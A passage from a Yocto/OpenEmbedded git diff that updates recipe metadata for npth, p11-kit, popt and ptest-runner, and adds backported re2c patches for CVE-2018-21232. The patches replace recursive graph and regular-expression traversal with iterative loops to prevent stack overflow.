SRC_URI_append_class-target = "\
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
SUMMARY = "New GNU Portable Threads library"
+DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
HOMEPAGE = "https://www.gnu.org/software/pth/"
SECTION = "libs"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index 4ba93f998a..5f1b73ee16 100644
--- a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,18 +1,21 @@
SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
+DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
+HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
-inherit meson gettext pkgconfig gtk-doc bash-completion
+inherit meson gettext pkgconfig gtk-doc bash-completion manpages
DEPENDS = "libtasn1 libtasn1-native libffi"
DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
-SRC_URI = "git://github.com/p11-glue/p11-kit"
-SRCREV = "762cdaa2cd5c5ec09cc844f9a6bdc551c7f6c8ed"
+SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
+SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
S = "${WORKDIR}/git"
PACKAGECONFIG ??= ""
+PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native"
PACKAGECONFIG[trust-paths] = "-Dtrust_paths=/etc/ssl/certs/ca-certificates.crt,,,ca-certificates"
GTKDOC_MESON_OPTION = 'gtk_doc'
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for parsing command line options"
+DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
HOMEPAGE = "http://rpm5.org/"
SECTION = "libs"
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
PV .= "+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \
+SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
"
UPSTREAM_VERSION_UNKNOWN = "1"
@@ -27,3 +27,5 @@ do_compile () {
do_install () {
install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
}
+
+RDEPENDS_${PN}_append_libc-glibc = " libgcc"
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
+From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Tue, 21 Apr 2020 21:28:32 +0100
+Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
+ YYFILL states).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Stack overflow reported by Agostino Sarubbo.
+Related to #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
+--- a/src/dfa/fillpoints.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/dfa/fillpoints.cc (date 1646929180243)
+@@ -5,151 +5,186 @@
+
+ #include "src/dfa/dfa.h"
+
+-namespace re2c
+-{
++
++/*
++ * note [finding strongly connected components of DFA]
++ *
++ * A slight modification of Tarjan's algorithm.
++ *
++ * The algorithm traverses the DFA in depth-first order. It maintains a stack
++ * of states that have already been visited but haven't been assigned to an SCC
++ * yet. For each state the algorithm calculates 'lowlink': index of the highest
++ * ancestor state reachable in one step from a descendant of this state.
++ * Lowlink is used to determine when a set of states should be popped off stack
++ * into a new SCC.
++ *
++ * We use lowlink to hold different kinds of information:
++ * - values in range [0 .. stack size] mean that the state is on stack (a
++ * link to a state with the smallest index reachable from this one)
++ * - SCC_UND means that this state has not been visited yet
++ * - SCC_INF means that this state has already been popped off stack
++ *
++ * We use stack size (rather than topological sort index) as a unique index of
++ * the state on stack. This is safe because the indices of states on stack are
++ * unique and less than the indices of states that have been popped off stack
++ * (SCC_INF).
++ */
++
++namespace re2c {
++ namespace {
+
+-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
+-static const size_t SCC_UND = SCC_INF - 1;
++ static const size_t SCC_INF = std::numeric_limits<size_t>::max();
++ static const size_t SCC_UND = SCC_INF - 1;
+
+-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
+-{
+- for (size_t i = 0; i < narcs; ++i)
+- {
+- if (arcs[i] == node)
+- {
+- return true;
+- }
+- }
+- return false;
+-}
++ static bool loopback(size_t state, size_t narcs, const size_t *arcs)
++ {
++ for (size_t i = 0; i < narcs; ++i) {
++ if (arcs[i] == state) return true;
++ }
++ return false;
++ }
+
+-/*
+- * node [finding strongly connected components of DFA]
+- *
+- * A slight modification of Tarjan's algorithm.
+- *
+- * The algorithm walks graph in deep-first order. It maintains a stack
+- * of nodes that have already been visited but haven't been assigned to
+- * SCC yet. For each node the algorithm calculates 'lowlink': index of
+- * the highest ancestor node reachable in one step from a descendant of
+- * the node. Lowlink is used to determine when a set of nodes should be
+- * popped off the stack into a new SCC.
+- *
+- * We use lowlink to hold different kinds of information:
+- * - values in range [0 .. stack size] mean that this node is on stack
+- * (link to a node with the smallest index reachable from this one)
+- * - SCC_UND means that this node has not been visited yet
+- * - SCC_INF means that this node has already been popped off stack
+- *
+- * We use stack size (rather than topological sort index) as unique index
+- * of a node on stack. This is safe because indices of nodes on stack are
+- * still unique and less than indices of nodes that have been popped off
+- * stack (SCC_INF).
+- *
+- */
+-static void scc(
+- const dfa_t &dfa,
+- std::stack<size_t> &stack,
+- std::vector<size_t> &lowlink,
+- std::vector<bool> &trivial,
+- size_t i)
+-{
+- const size_t link = stack.size();
+- lowlink[i] = link;
+- stack.push(i);
++ struct StackItem {
++ size_t state; // current state
++ size_t symbol; // next arc to be visited in this state
++ size_t link; // Tarjan's "lowlink"
++ };
++
++// Tarjan's algorithm
++ static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs)
++ {
++ std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
++ std::stack<size_t> stack;
++
++ StackItem x0 = {0, 0, 0};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ size_t link = stack_dfs.back().link;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ //DASSERT(lowlink[i] == SCC_UND);
++ link = lowlink[i] = stack.size();
++ stack.push(i);
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(lowlink[j] != SCC_UND);
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
+
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- if (lowlink[j] == SCC_UND)
+- {
+- scc(dfa, stack, lowlink, trivial, j);
+- }
+- if (lowlink[j] < lowlink[i])
+- {
+- lowlink[i] = lowlink[j];
+- }
+- }
+- }
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) {
++ if (lowlink[j] == SCC_UND) {
++ break;
++ }
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
++ }
+
+- if (lowlink[i] == link)
+- {
+- // SCC is non-trivial (has loops) iff it either:
+- // - consists of multiple nodes (they all must be interconnected)
+- // - consists of single node which loops back to itself
+- trivial[i] = i == stack.top()
+- && !loopback(i, dfa.nchars, arcs);
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, link};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_UND};
++ stack_dfs.push_back(x2);
++ }
++ else if (lowlink[i] == link) {
++ // all successors have been visited
++ // SCC is non-trivial (has loops) if either:
++ // - it contains multiple interconnected states
++ // - it contains a single self-looping state
++ trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
+
+- size_t j;
+- do
+- {
+- j = stack.top();
+- stack.pop();
+- lowlink[j] = SCC_INF;
+- }
+- while (j != i);
+- }
+-}
++ for (;;) {
++ const size_t j = stack.top();
++ stack.pop();
++ lowlink[j] = SCC_INF;
++ if (i == j) break;
++ }
++ }
++ }
++ }
+
+-static void calc_fill(
+- const dfa_t &dfa,
+- const std::vector<bool> &trivial,
+- std::vector<size_t> &fill,
+- size_t i)
+-{
+- if (fill[i] == SCC_UND)
+- {
+- fill[i] = 0;
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- calc_fill(dfa, trivial, fill, j);
+- size_t max = 1;
+- if (trivial[j])
+- {
+- max += fill[j];
+- }
+- if (max > fill[i])
+- {
+- fill[i] = max;
+- }
+- }
+- }
+- }
+-}
+-
+-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
+-{
+- const size_t size = dfa.states.size();
+-
+- // find DFA states that belong to non-trivial SCC
+- std::stack<size_t> stack;
+- std::vector<size_t> lowlink(size, SCC_UND);
+- std::vector<bool> trivial(size, false);
+- scc(dfa, stack, lowlink, trivial, 0);
+-
+- // for each DFA state, calculate YYFILL argument:
+- // maximal path length to the next YYFILL state
+- fill.resize(size, SCC_UND);
+- calc_fill(dfa, trivial, fill, 0);
++ static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ fill.resize(nstates, SCC_UND);
++
++ StackItem x0 = {0, 0, SCC_INF};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ if (fill[i] != SCC_UND) continue;
++ fill[i] = 0;
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
++ fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
++ }
++
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) break;
++ }
++
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, SCC_INF};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_INF};
++ stack_dfs.push_back(x2);
++ }
++ }
+
+- // The following states must trigger YYFILL:
+- // - inital state
+- // - all states in non-trivial SCCs
+- // for other states, reset YYFILL argument to zero
+- for (size_t i = 1; i < size; ++i)
+- {
+- if (trivial[i])
+- {
+- fill[i] = 0;
+- }
+- }
+-}
++ // The following states must trigger YYFILL:
++ // - inital state
++ // - all states in non-trivial SCCs
++ // for other states, reset YYFILL argument to zero
++ for (size_t i = 1; i < nstates; ++i) {
++ if (trivial[i]) {
++ fill[i] = 0;
++ }
++ }
++ }
+
++ } // anonymous namespace
++
++ void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ std::vector<bool> trivial(nstates, false);
++ std::vector<StackItem> stack_dfs;
++ stack_dfs.reserve(nstates);
++
++ // find DFA states that belong to non-trivial SCC
++ scc(dfa, trivial, stack_dfs);
++
++ // for each DFA state, calculate YYFILL argument:
++ // maximal path length to the next YYFILL state
++ calc_fill(dfa, trivial, stack_dfs, fill);
++ }
++
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
+From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Wed, 22 Apr 2020 22:37:24 +0100
+Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Stauts: Backport:
+https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/tag.cc b/src/re/tag.cc
+--- a/src/re/tag.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.cc (date 1646986908580)
+@@ -6,7 +6,7 @@
+ {
+
+ const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
+-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
++const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
+ const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
+
+ } // namespace re2c
+
+
+diff --git a/src/re/tag.h b/src/re/tag.h
+--- a/src/re/tag.h (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.h (date 1646986922376)
+@@ -19,7 +19,7 @@
+ struct Tag
+ {
+ static const size_t RIGHTMOST;
+- static const size_t VARDIST;
++ static const uint32_t VARDIST;
+ static const size_t FICTIVE;
+
+ const std::string *name;
+
+
+diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
+--- a/src/re/fixed_tags.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/fixed_tags.cc (date 1646991137317)
+@@ -7,78 +7,131 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++namespace {
+
+ /* note [fixed and variable tags]
+ *
+- * If distance between two tags is constant (equal for all strings that
+- * match the given regexp), then lexer only needs to track one of them:
+- * the second tag equals the first tag plus static offset.
++ * If distance between two tags is constant (equal for all strings that match
++ * the given regexp), then lexer only needs to track one of them: the second
++ * tag equals the first tag plus static offset.
+ *
+- * However, this optimization is applied only to tags in top-level
+- * concatenation, because other tags may be uninitialized and we don't
+- * want to mess with conditional calculation of fixed tags.
+- *
++ * This optimization is applied only to tags in top-level concatenation,
++ * because in other cases the base tag may be NULL, and the calculation of
++ * the fixed tag value is not as simple as substracting a fixed offset.
+ * Furthermore, fixed tags are fobidden with generic API because it cannot
+- * express fixed offsets.
+- *
+- * Tags with history also cannot be fixed.
++ * express fixed offsets. M-tags (with history) also cannot be fixed.
+ *
+ * Another special case is fictive tags (those that exist only to impose
+- * hierarchical laws of POSIX disambiguation). We treat them as fixed
+- * in order to suppress code generation.
++ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
++ * to suppress code generation.
+ */
+
+-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
+- size_t &dist, size_t &base, bool toplevel)
++struct StackItem {
++ RE *re; // current sub-RE
++ uint32_t dist; // distance backup for alternative, unused for other RE
++ uint8_t succ; // index of the next successor to be visited
++ bool toplevel; // if this sub-RE is in top-level concatenation
++};
++
++static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
+ {
+- switch (re->type) {
+- case RE::NIL: break;
+- case RE::SYM:
+- if (dist != Tag::VARDIST) ++dist;
+- break;
+- case RE::ALT: {
+- size_t d1 = dist, d2 = dist;
+- find_fixed_tags(re->alt.re1, tags, d1, base, false);
+- find_fixed_tags(re->alt.re2, tags, d2, base, false);
+- dist = (d1 == d2) ? d1 : Tag::VARDIST;
+- break;
+- }
+- case RE::CAT:
+- find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
+- find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
+- break;
+- case RE::ITER:
+- find_fixed_tags(re->iter.re, tags, dist, base, false);
+- dist = Tag::VARDIST;
+- break;
+- case RE::TAG: {
+- // see note [fixed and variable tags]
+- Tag &tag = tags[re->tag.idx];
+- if (fictive(tag)) {
+- tag.base = tag.dist = 0;
+- } else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
+- tag.base = base;
+- tag.dist = dist;
+- } else if (toplevel) {
+- base = re->tag.idx;
+- dist = 0;
+- }
+- if (trailing(tag)) dist = 0;
+- break;
+- }
+- }
++ static const uint32_t VARDIST = Tag::VARDIST;
++ bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
++
++ // base tag, intially the fake "rightmost tag" (the end of RE)
++ size_t base = Tag::RIGHTMOST;
++
++ // the distance to the nearest top-level tag to the right (base tag)
++ uint32_t dist = 0;
++
++ const StackItem i0 = {re0, VARDIST, 0, toplevel};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++ RE *re = i.re;
++
++ if (re->type == RE::SYM) {
++ if (dist != VARDIST) ++dist;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // save the current distance on stack (from the alternative end
++ // to base) and recurse into the left sub-RE
++ StackItem k = {re, dist, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // save the current distance on stack (from the left sub-RE to
++ // base), reset distance to the distance popped from stack (from
++ // the alternative end to base), recurse into the right sub-RE
++ StackItem k = {re, dist, 2, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, VARDIST, 0, false};
++ stack.push_back(j);
++ dist = i.dist;
++ }
++ else {
++ // both sub-RE visited, compare the distance on stack (from the
++ // left sub-RE to base) to the current distance (from the right
++ // sub-RE to base), if not equal set variable distance
++ dist = (i.dist == dist) ? i.dist : VARDIST;
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, VARDIST, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, assume unknown number of iterations
++ // TODO: find precise distance for fixed repetition counter
++ dist = VARDIST;
++ }
++ }
++ else if (re->type == RE::CAT) {
++ // the right sub-RE is pushed on stack after the left sub-RE and
++ // visited earlier (because distance is computed from right to left)
++ StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
++ stack.push_back(j1);
++ StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
++ stack.push_back(j2);
++ }
++ else if (re->type == RE::TAG) {
++ // see note [fixed and variable tags]
++ Tag &tag = spec.tags[re->tag.idx];
++ if (fictive(tag)) {
++ tag.base = tag.dist = 0;
++ }
++ else if (i.toplevel && dist != VARDIST && !history(tag)) {
++ tag.base = base;
++ tag.dist = dist;
++ }
++ else if (i.toplevel) {
++ base = re->tag.idx;
++ dist = 0;
++ }
++ if (trailing(tag)) {
++ dist = 0;
++ }
++ }
++ }
+ }
++
++} // anonymous namespace
+
+-void find_fixed_tags(RESpec &spec)
+-{
+- const bool generic = spec.opts->input_api == INPUT_CUSTOM;
+- std::vector<RE*>::iterator
+- i = spec.res.begin(),
+- e = spec.res.end();
+- for (; i != e; ++i) {
+- size_t base = Tag::RIGHTMOST, dist = 0;
+- find_fixed_tags(*i, spec.tags, dist, base, !generic);
+- }
+-}
++ void find_fixed_tags(RESpec &spec)
++ {
++ std::vector<StackItem> stack;
++ for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
++ find_fixed_tags(spec, stack, *i);
++ }
++ }
+
+-} // namespace re2c
++} // namespace re2c
+\ No newline at end of file
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
+From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 22:16:51 +0100
+Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/nullable.cc b/src/re/nullable.cc
+--- a/src/re/nullable.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/nullable.cc (date 1647253886226)
+@@ -9,43 +9,100 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++ namespace {
++
++ struct StackItem {
++ const RE *re; // current sub-RE
++ uint8_t succ; // index of the next sucessor to be visited
++ };
+
+-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
+-{
+- if (trail) return true;
++ static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
++ {
++ // the "nullable" status of the last sub-RE visited by DFS
++ bool null = false;
+
+- switch (re->type) {
+- case RE::NIL: return true;
+- case RE::SYM: return false;
+- case RE::ITER:
+- return nullable(spec, re->iter.re, trail);
+- case RE::TAG:
+- trail |= trailing(spec.tags[re->tag.idx]);
+- return true;
+- case RE::ALT:
+- return nullable(spec, re->alt.re1, trail)
+- || nullable(spec, re->alt.re2, trail);
+- case RE::CAT:
+- return nullable(spec, re->cat.re1, trail)
+- && nullable(spec, re->cat.re2, trail);
+- }
+- return false; /* unreachable */
+-}
++ const StackItem i0 = {re0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ null = true;
++ }
++ else if (re->type == RE::SYM) {
++ null = false;
++ }
++ else if (re->type == RE::TAG) {
++ null = true;
+
+-/*
+- * warn about rules that match empty string
+- * (including rules with nonempty trailing context)
+- * false positives on partially self-shadowed rules like [^]?
+- */
+-void warn_nullable(const RESpec &spec, const std::string &cond)
+-{
+- const size_t nre = spec.res.size();
+- for (size_t i = 0; i < nre; ++i) {
+- bool trail = false;
+- if (nullable(spec, spec.res[i], trail)) {
+- spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
+- }
+- }
+-}
++ // Trailing context is always in top-level concatenation, and sub-RE
++ // are visited from left to right. Since we are here, sub-RE to the
++ // left of the trailing context is nullable (otherwise we would not
++ // recurse into the right sub-RE), therefore the whole RE is nullable.
++ if (trailing(spec.tags[re->tag.idx])) {
++ //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
++ stack.pop_back();
++ break;
++ }
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0};
++ stack.push_back(j);
++ }
++ else if (!null) {
++ // if the left sub-RE is nullable, so is alternative, so stop
++ // recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->alt.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0};
++ stack.push_back(j);
++ }
++ else if (null) {
++ // if the left sub-RE is not nullable, neither is concatenation,
++ // so stop recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->cat.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::ITER) {
++ // iteration is nullable if the sub-RE is nullable
++ // (zero repetitions is represented with alternative)
++ StackItem j = {re->iter.re, 0};
++ stack.push_back(j);
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return null;
++ }
++
++ } // anonymous namespace
++
++// Warn about rules that match empty string (including rules with nonempty
++// trailing context). False positives on partially self-shadowed rules like [^]?
++ void warn_nullable(const RESpec &spec, const std::string &cond)
++ {
++ std::vector<StackItem> stack;
++ const size_t nre = spec.res.size();
++ for (size_t i = 0; i < nre; ++i) {
++ if (nullable(spec, stack, spec.res[i])) {
++ spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
++ }
++ }
++ }
+
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
+From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 23:02:21 +0100
+Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
+ RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
+--- a/src/nfa/estimate_size.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/nfa/estimate_size.cc (date 1647005399735)
+@@ -6,41 +6,113 @@
+ #include "src/re/re.h"
+
+ namespace re2c {
++namespace {
++
++struct StackItem {
++ const RE *re; // current sub-RE
++ uint32_t size; // size of the sub-RE (only for alternative and concatenation)
++ uint8_t succ; // index of the next sucessor to be visited
++};
+
+-static size_t estimate(const RE *re)
++static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
+ {
+- switch (re->type) {
+- case RE::NIL: return 0;
+- case RE::SYM: return 1;
+- case RE::TAG: return 1;
+- case RE::ALT:
+- return estimate(re->alt.re1)
+- + estimate(re->alt.re2)
+- + 1;
+- case RE::CAT:
+- return estimate(re->cat.re1)
+- + estimate(re->cat.re2);
+- case RE::ITER: {
+- const size_t
+- iter = estimate(re->iter.re),
+- min = re->iter.min,
+- max = re->iter.max;
+- return max == AST::MANY
+- ? iter * min + 1
+- : iter * max + (max - min);
+- }
+- }
+- return 0; /* unreachable */
+-}
++ // the estimated size of the last sub-RE visited by DFS
++ uint32_t size = 0;
++
++ const StackItem i0 = {re0, 0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ size = 0;
++ }
++ else if (re->type == RE::SYM || re->type == RE::TAG) {
++ size = 1;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size // right sub-RE (just visited by DFS)
++ + 1; // additional state for alternative
++ }
++ }
